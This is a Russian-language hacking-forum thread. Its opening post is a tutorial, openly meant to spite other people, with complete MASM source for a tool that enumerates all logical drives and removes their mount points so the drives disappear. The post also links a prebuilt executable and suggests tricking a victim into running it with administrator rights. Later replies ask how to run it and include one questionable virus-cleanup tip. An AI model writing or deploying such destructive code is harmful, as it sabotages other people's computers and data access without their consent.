PDA

Просмотр полной версии : блокируем все логические диски в системе!


vazonez
24.10.2009, 00:44
Блокируем все логические диски в системе!

Ты никогда не задумывался о том, чтобы основательно подпортить кому-то нервы, время и деньги? Что ни разу? Я вот об этом думаю каждый день :-) Поэтому приходится выдумывать способы доставления такого "счастья" людям. Ну так вот - этот маленький туториал приподносит еще один метод западла.

Итак, цель - заблокировать все диски в системе. Можно долго выдумывать изощренные приемы достижения блока, но есть уже готовый и продуманный - прогеры из M$ создали готовую API для этого - DeleteVolumeMountPoint

Вот что о ней говорит MSDN:

Deletes a drive letter or mounted folder.

Как раз подходит для абсолютного зла! Её то мы и будет использовать. Пример кода будет на MASM, но учитывая что это всего лишь API, использовать идею можно и на Delphi и на других языках.

Код:

.386
.model flat, stdcall
option casemap: none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib

.data
Disk db 'Z:\',0
hDisk dd 0

.code
start:
invoke SetErrorMode, SEM_FAILCRITICALERRORS
invoke GetLogicalDrives
mov ecx,25
find_drives:
mov ebx,1
shl ebx,cl
and ebx,eax
je no_disk
add cl,65
mov byte ptr Disk,cl
sub cl,65
push ecx
push eax
invoke DeleteVolumeMountPoint, addr Disk
; Функция требует всего один параметр - букву диска в виде Z:\
pop eax
pop ecx
no_disk:
dec ecx
jge find_drives

invoke ExitProcess,0
end start


Исходник с ресурсами и прочей лабудой, и готовым EXE залит по этому адресу:
[Ссылки доступны только зарегистрированным пользователям]
Пароль: vazonez


А теперь приступим к тестированию "утилиты" ;-)
Оговорюсь, тулза будет работать только под аккаунтом Администратора, поэтому сам думай, как впарить ее недругу.

После запуска, "Мой Компьютер" станет не похож на себя - не останется ни одного диска:

[Ссылки доступны только зарегистрированным пользователям] ([Ссылки доступны только зарегистрированным пользователям])

Удивленному юзеру ничего не останется, как перезагрузить машину - работать станет невозможно:

[Ссылки доступны только зарегистрированным пользователям] ([Ссылки доступны только зарегистрированным пользователям])

После перезагрузки появится только системный раздел, а все остальное - CD-ROM, Floppy и другие локальные диски так и останутся в инвизе ;-)

Не буду напоминать, сколько всего можно добавить и улучшить - вариантов масса, все зависит только от твоей фантазии!
Удачи!

Оригинал:
[Ссылки доступны только зарегистрированным пользователям]

urus-shaitan
24.10.2009, 15:53
подскажите пожалуйста "чайнику", как "запустить" прогу???

vazonez
24.10.2009, 16:27
в архиве лежит ехе файл - запусти его и увидишь нагляднядный результат))

Reantwist
08.11.2009, 04:04
Добрый день Вопрос озможно не потеме, но все же может кто знает.
Итак, после очередной вирусной атакипредположительно троян, не могу открыть логические диски. Т.е. как раньше через двойной щелчек мыши я не могу на диск попасть. Пишет: "отказано в доступе".
А могу только, если выбрать в меню "открыть". И еще появилось меню "Автозапуск". Что делать?

ping-369
27.04.2010, 22:38
Добрый день Вопрос озможно не потеме, но все же может кто знает.
Итак, после очередной вирусной атакипредположительно троян, не могу открыть логические диски. Т.е. как раньше через двойной щелчек мыши я не могу на диск попасть. Пишет: "отказано в доступе".
А могу только, если выбрать в меню "открыть". И еще появилось меню "Автозапуск". Что делать?

Ну ты попал!!!
Ну я тебе ничего посоветовать немогу кроме того, как найти процесс троя, выгрузить его, зайти на этот диск(ВНИМАНИЕ ДЛЯ САМЫХ ОДАРЁННЫХ ЧЕРЕЗ ПУНКТ Открыть!!!!!(ЭтО ВАЖНО!!!!), и удалить скрытые папки и файлы, ну и наконец то надо найти файл(соответствующий имени найденого процесса вируса) и удалить его и твой комп чист:)
Ну если не получится :( то юзай диск с надписью Micrsoft Windows XP(или другая) SP *.
Всё чем мог помочь сказал!*thumbs up*
Ну если получилось ставь АВ получше!
и заодно если получится + если нежалко!!!:)

olegteror
28.04.2010, 10:49
и удалить скрытые папки и файлы,
:rofl: хороший таки троян посоветовал юзер сам удалит все Загрузчики винды,все скрытые файлы ВСЕ :rofl: